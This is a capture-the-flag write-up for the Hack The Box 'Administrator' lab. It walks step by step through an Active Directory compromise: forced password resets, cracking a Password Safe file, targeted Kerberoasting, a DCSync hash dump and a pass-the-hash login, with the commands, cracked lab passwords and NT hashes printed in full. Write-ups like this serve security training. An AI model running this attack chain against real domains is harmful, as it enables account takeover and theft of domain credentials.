Credentials provided from HTB

Olivia:ichliebedich

 

Grab bloodhound data

bloodhound-python -u olivia -d administrator.htb -c All -ns 10.10.11.42

 

We have generic all over michael so we can change his password

net rpc password "michael" "newP@ssword2022" -U "administrator.htb"/"olivia"%"ichliebedich" -S "dc.administrator.htb"

 

netexec smb 10.10.11.42 -u "michael" -p "newP@ssword2022"
 

 

Michael can change benjamins password

 

 

 

Same command again

net rpc password "benjamin" "newP@ssword2022" -U "administrator.htb"/"michael"%"newP@ssword2022" -S "dc.administrator.htb"

 

 

benjamin is part of share moderators so i tried FTP and his login worked

 

Never seen this file before but we can turn it into a john hash

pwsafe2john Backup.psafe3 > hash.txt

cat hash.txt
Backu:$pwsafe$*3*4ff588b74906263ad2abba592aba35d58bcd3a57e307bf79c8479dec6b3149aa*2048*1a941c10167252410ae04b7b43753aaedb4ec63e3f18c646bb084ec4f0944050

 

 

hash cracks to tekieromucho

john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt

 

 

Downloaded password safe on my local machine

I couldnt grab a screenshot as everytime you try to screenshot the app disapears for security reasons. But theres the 3 users and their passwords below.

alexander:UrkIbagoxMyUGw0aPlj9B0AXSea4Sw
emily:UXLCI5iETUsIBoFVTj8yQFKoHjXmb
emma:WwANQWnmJnGV07WQN8bMS7FMAbjNur

 

Only emily works

 

 

Emily has generic write over ethan

 

 

First attempt failed due to “Clock skew too great”

 

 

Sync time server

sudo ntpdate 10.10.11.42

 

Running exploit again

python3 targetedKerberoast.py -v -d 'administrator.htb' -u 'emily' -p 'UXLCI5iETUsIBoFVTj8yQFKoHjXmb'

 

And we get the hash

 

$krb5tgs$23$*ethan$ADMINISTRATOR.HTB$administrator.htb/ethan*$be77d368f305fe0416a4e866f27a9723$b1ff50fca65cec7353ed5ee8e6dee30290f4a2f53408e7e36fd51279a70dd194835f5520f854331f50334708a8f6278c6b9875d958008fe5bc9a92f71d9e8ba1e8dc5417089614f507b3c85e56a65a11a268fc052fb8dd284a150bdb0f473cd35f997cd3010a4422b67264bbd2ef0e18e36778a0735ec0e2e5173a3cd125dfb82a2dbf12aa170fa602c7c4b42518a8e035f557308bc733675720e852a6128e7ca4105982b30d2ebf8e40c6875b29d11681ca1341b7d37c917b6dda894de40c612aff5939a88ab5c3cb0311b209a6a55c757f89c9f40cee714a076c97a57ceb3751212f63a5f9c4e85244d1cf6b7ba7c92f2fef9cac89b68c806545f244b028add3f14e8d4260555d22df293f8aecbadedacaf72fe4b9d8c63a972ba05b1911360a8748ee0d6b6962b6ee71f6a50b52c235d729550cd8bdae2c04c46289669758f740e88f4d0af183a412d495b113d567acfb44bf60c199d1d6163bc98d4a43b437de6594a84d6524608d04c64be66e00d243c15b55b65fb9dfddbfcaef2b2d336ab62d1e8360fc66766d8ce70d40c0348d8a5da34065591eb9f4be155c1399f7117ccafc0aad0b865540bd087df1a1de4c7d2b6d3b2da5ad5cc4bc95adec13d190521aebb1f732c29d3e8ed069e0c640acaaf772222650e4962ff5a1c7ca0f7b04d3ca161a9b1df2be0ec484625a0ba387733b1171a105edacc8a9afaa059c52d2c9e8b04b5768f8119a9dae1b42e0ae8536ede25d9037220af5bd656e54407b419ac75b9d93a135c21e4f474b32a465f81dc12c7bfacd998f2ce05f2db0c2170dcf28df17fb666afa7e022cde7404465969566f6213dbccd189ffe7109f398607cf8efab445823699735556a9c70c4d5e9fa8f546406df961b6fbbd74f421dfe24983d31ef545e8c2cacce92e36c15e8a91c402f9881c2a900ec51a308a18c1522f1f1da7385c170185362048c3c7eec72a3a9ccc4b2e2adee977afb52f96720ba14824f0086cf60783940d810cf06b511a2ebea8059ca66f92f6f41a55403a5254205922429fc22316198c30143da40dc365192c104b16e8635a0c99ccaa96790165ea53ec3775a6423d4db1f90f04774a4bfde957b0212ab3578f042ad340d004b1422b51bde41b0464638483c4f196ec01ed9c7fb826dba59b839746b7283bbe1709ac210bcc03e51ac4d0b5b55b070d68c565e19026e988f8ab862ac6e82c63bcea972d331b631ebe8701b26ea5480de591dd53a6f3f88ff8c35ac68d59347980c40178d6187e673895a4e4d19ce65f02b08873c5c4aeffd55ad8b7ea9445942e0f7a7af1f786b02bf68bbe7209b09a6167d500da0f7a2028beb621e88b7a8b1ed7552bc92e6c6b16d906de93178b33aa5ade4ad9d8a3f7295e034de85ae462287fef0a6b097d48b1a1897514975cdbee913ce5fd02c651dc2274c831cd71b368c1ae11c2ad0e9f7580a5d77e8829fc743287b6b1c60023ba3a2614f2006f1672d75517bb52bc09a275f7188df82a78b0fcef4fa0479c35b44b08b2be

 

Hash cracks to limpbizkit

ethan:limpbizkit

 

 

Still cant remote in but ethan can perform a DCsync attack

 

 

 

dump hashes

impacket-secretsdump 'administrator.htb'/'ethan':'limpbizkit'@'10.10.11.42' 

 

Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied 
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:3dc553ce4b9fd20bd016e098d2d2fd2e:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:1181ba47d45fa2c76385a82409cbfaf6:::
administrator.htb\olivia:1108:aad3b435b51404eeaad3b435b51404ee:fbaa3e2294376dc0f5aeb6b41ffa52b7:::
administrator.htb\michael:1109:aad3b435b51404eeaad3b435b51404ee:fb54d1c05e301e024800c6ad99fe9b45:::
administrator.htb\benjamin:1110:aad3b435b51404eeaad3b435b51404ee:fb54d1c05e301e024800c6ad99fe9b45:::
administrator.htb\emily:1112:aad3b435b51404eeaad3b435b51404ee:eb200a2583a88ace2983ee5caa520f31:::
administrator.htb\ethan:1113:aad3b435b51404eeaad3b435b51404ee:5c2b9f97e0620c3d307de85a93179884:::
administrator.htb\alexander:3601:aad3b435b51404eeaad3b435b51404ee:cdc9e5f3b0631aa3600e0bfec00a0199:::
administrator.htb\emma:3602:aad3b435b51404eeaad3b435b51404ee:11ecd72c969a57c34c819b41b54455c9:::
 

 

 

 

Remote in as admin and grab both flags

evil-winrm -i 10.10.11.42 -u administrator -H 3dc553ce4b9fd20bd016e098d2d2fd2e

 

 

This machine was rated as a medium but it was pretty easy and straight forward.